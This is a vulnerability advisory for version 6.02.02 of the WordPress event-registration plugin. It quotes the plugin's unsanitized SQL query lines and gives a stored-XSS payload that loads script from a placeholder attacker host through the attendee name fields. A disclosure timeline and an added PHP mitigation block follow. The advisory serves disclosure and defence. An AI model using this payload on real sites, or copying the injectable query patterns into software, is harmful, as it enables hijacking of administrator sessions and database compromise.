* Exploit Title: WordPress Plugin event-registration 6.02.02: SQL-Injection and persistent XSS
* Discovery Date: 2016/03/13
* Public Disclosure Date: 2016/05/09
* Exploit Author: Michael Helwig
* Contact: https://twitter.com/c0dmtr1x | https://codemetrix.net
* Vendor Homepage: http://wpeventregister.com/
* Software Link: https://plugins.svn.wordpress.org/event-registration/tags/6.02.02/
* Version: 6.02.02
* Tested on: WordPress 4.4.1
* Category: webapps

DESCRIPTION
-----------

The plugin event-registration contains, in its current version 6.02.02, multiple vulnerabilities:

1. SQL-Injections

There is a SQL-Injection visible in the code in evr_public-process_confirmation.php, line 32:

    22: $submitted_token = isset($_POST['token'])?$_POST['token']:'0';
    ... no sanitization of $submitted_token ...
    32: $sql = 'SELECT * FROM ' . get_option('evr_attendee') . " WHERE token='{$submitted_token}'";
    33: $attendee_valid = $wpdb->get_row($sql);

Another injection is in line 63:

    19: $qanda = unserialize(urldecode($_POST["questions"]));
    ... no sanitization of $qanda ...
    61: $question_id = $qanda[$i]['question'];
    62: $response = $qanda[$i]["response"];
    63: if($question_id !=''){$wpdb->query("INSERT into ".get_option('evr_answer')." (registration_id, question_id, answer)
    64: values ('$reg_id', '$question_id', '$response')");}

(see: https://plugins.svn.wordpress.org/event-registration/tags/6.02.02/public/evr_public-process_confirmation.php )

2. Persistent XSS

There is a persistent XSS in the attendee's first name and last name fields on registration confirmation (evr_public-process_confirmation.php). Quotes are escaped, but the following vector still succeeds and is executed, e.g. in Firefox and Chrome:

    <script src=http://evil.example.com/evil.js></script>

When injected as first name or last name on the attendee's registration confirmation page (step 2 of the attendee's default registration process), the injected script gets loaded as soon as a backend user visits the list of attendees.
A demonstration of the XSS issues can be found here: https://www.youtube.com/watch?v=N4eaCAhk-a0

TIMELINE
--------

2016/03/13 - Issues discovered
2016/03/21 - Issues reported to vendor. No response.
2016/03/31 - Issues reported to WordPress security team
2016/04/01 - Reply from WordPress security team. Plugin vanished from plugin directory shortly after.
2016/05/09 - No information about any (planned) fixes. Disclosure.
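As an added mitigation example, not code from the plugin or from the advisory author: the two injection points and the attendee-list rendering described above, rewritten on the WordPress $wpdb->prepare() and esc_html() APIs. The function names, the fname/lname column names and the row markup are assumptions.

```php
<?php
// Added example, not the plugin's code: hardened forms of the two injection
// points and of the attendee-list output. Assumes a WordPress runtime.

function evr_lookup_attendee_by_token( $submitted_token ) {
    global $wpdb;
    // Table name comes from the options table, not from the request.
    $table = get_option( 'evr_attendee' );
    // %s is quoted and escaped by wpdb, so a token such as  ' OR '1'='1
    // is compared literally instead of being parsed as SQL.
    $sql = $wpdb->prepare( "SELECT * FROM {$table} WHERE token = %s", $submitted_token );
    return $wpdb->get_row( $sql );
}

function evr_store_answers( $reg_id, $raw_questions ) {
    global $wpdb;
    // Same decoding as the plugin, but on PHP 7+ refuse to instantiate objects
    // from the serialized blob (defence in depth for untrusted unserialize()).
    $qanda = unserialize( urldecode( $raw_questions ), array( 'allowed_classes' => false ) );
    if ( ! is_array( $qanda ) ) {
        return 0;
    }
    $table    = get_option( 'evr_answer' );
    $inserted = 0;
    foreach ( $qanda as $item ) {
        // Question ids are integers: absint() casts, so non-numeric input becomes 0.
        $question_id = isset( $item['question'] ) ? absint( $item['question'] ) : 0;
        $response    = isset( $item['response'] ) ? sanitize_text_field( $item['response'] ) : '';
        if ( 0 === $question_id ) {
            continue;
        }
        // %d for the ids, %s for the free-text answer; nothing is interpolated.
        $wpdb->query( $wpdb->prepare(
            "INSERT INTO {$table} (registration_id, question_id, answer) VALUES (%d, %d, %s)",
            absint( $reg_id ), $question_id, $response
        ) );
        $inserted++;
    }
    return $inserted;
}

// Stored XSS: names are rendered in the backend attendee list. Escaping at
// output with esc_html() turns < and > into entities, so the advisory's
// <script src=...></script> payload is shown as text, never loaded.
// Column names fname/lname and the row markup are assumed, not the plugin's.
function evr_render_attendee_row( $attendee ) {
    return '<tr><td>' . esc_html( $attendee->fname ) . '</td><td>'
         . esc_html( $attendee->lname ) . '</td></tr>';
}
```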